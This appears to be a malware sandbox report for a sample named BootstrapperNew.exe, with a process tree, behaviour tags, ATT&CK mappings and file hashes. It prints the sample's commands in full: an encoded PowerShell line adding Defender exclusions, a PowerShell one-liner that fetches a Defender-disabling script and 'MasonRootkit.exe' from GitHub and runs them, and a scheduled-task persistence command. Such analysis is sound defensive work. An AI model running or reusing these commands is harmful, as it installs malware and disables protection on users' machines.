C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3032
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQBoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAaAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAZwBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHAAegBlACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\WebThreatDefense (32 Bits).exe"C:\Windows\WebThreatDefense (32 Bits).exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4728 -
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\ProgramData\MasonRootkit.exe"C:\ProgramData\MasonRootkit.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB5F2.tmp.bat""6⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2292
-
-
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:1624
-
-
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "WebThreatDefense (32 Bits)" /tr "C:\Users\Admin\AppData\Roaming\WebThreatDefense (32 Bits).exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
-
C:\Users\Admin\AppData\Local\BootstrapperNew.exe"C:\Users\Admin\AppData\Local\BootstrapperNew.exe"3⤵
- Executes dropped EXE
PID:4524
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2004
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3652
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3992
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4208
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4536
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2296
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:816
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2932
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:5024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4888
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2088
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3732
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 97ca8b64daba3b063cd058d69cb60ef6 Xu7WT26x6k2+3Q23lkzhQw.0.1.0.0.01⤵
- Sets service image path in registry
PID:4160 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3708
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4180
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
- Drops file in Windows directory
PID:6040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
PID:3532
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4320
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Indicator Removal
1Clear Windows Event Logs
1Modify Registry
2Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
596KB
MD5bb2fd6c1b233fd2f08a6a43ef860bcb6
SHA11cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04
SHA2568c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce
SHA5122ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5
-
Filesize
2.9MB
MD5f227cdfd423b3cc03bb69c49babf4da3
SHA13db5a97d9b0f2545e7ba97026af6c28512200441
SHA256cb5d6c1ca0aa6232a2d55e14b20ac4a9945a0bd063c57d60a5ed3ae94160e3e8
SHA512b10afd03b02a928545c16fad39a6ae46b68b1e1a2477a6990803ce80008e7161fb2ebc9380ba15a1b074bb436aa34bcd6c94a922933d438b1c22489717e1e10e
-
Filesize
1KB
MD53982d6d16fd43ae609fd495bb33433a2
SHA16c33cd681fdfd9a844a3128602455a768e348765
SHA2569a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9
SHA5124b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa
-
Filesize
1KB
MD57446d8ced64a2dbc337827fc1de29824
SHA153415867dc152a8fa3acb2e55a6c0696f60b8a25
SHA256abf04423d7deddbaf09c777b529cb7755a8e0f40ff0135d6a7a669b6a6f9a4f7
SHA512460e26ef6388dd2dc7dce1af96b164a275cb6751930035955af02d12916dbf4e960929a0b4fedb3419445f23690fb71388eac4ed263d06601f7cd873f6656e79
-
Filesize
612KB
MD55e1eb1a67d40ccae40dee2a037ca6c64
SHA1786b54d3d451ea40faeeb20fd30a38744862eeb5
SHA25680e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f
SHA5120484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
164B
MD51533db3844b9940e0e294e397750108e
SHA1fe2356b702b65f9e036d6135dbe77fd29f505b2a
SHA25650c94d37c1dd5aa656bfe0a86ffa7fb5e0556fe002b64d2534259f1aa28593e1
SHA51259432057a6d19d63b51da0398eb142f27ad3a3b8e11920f28db2ea081b082f7a651b888ef8c3e14fc280190ee42ae7e2a8ada01c83b2a92bf6f46dc225b74346
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
55KB
MD5fad99ed1ce248abccb30263e482f2980
SHA166272d7b886f43e553837b400e216fdff0e0deee
SHA256e520d5a52f95194e9eef5f9fdb2fec5b7e5b4c71dbfc29af1e61bcc8b3674a6a
SHA512759b84349741db5c5d2ee17b1f9673733a1c57e7a9a7aed487faf7532c350b566b3f12e04665232258b8e358bccd9051c6f3d0c1ae6262d7cfc60385386935eb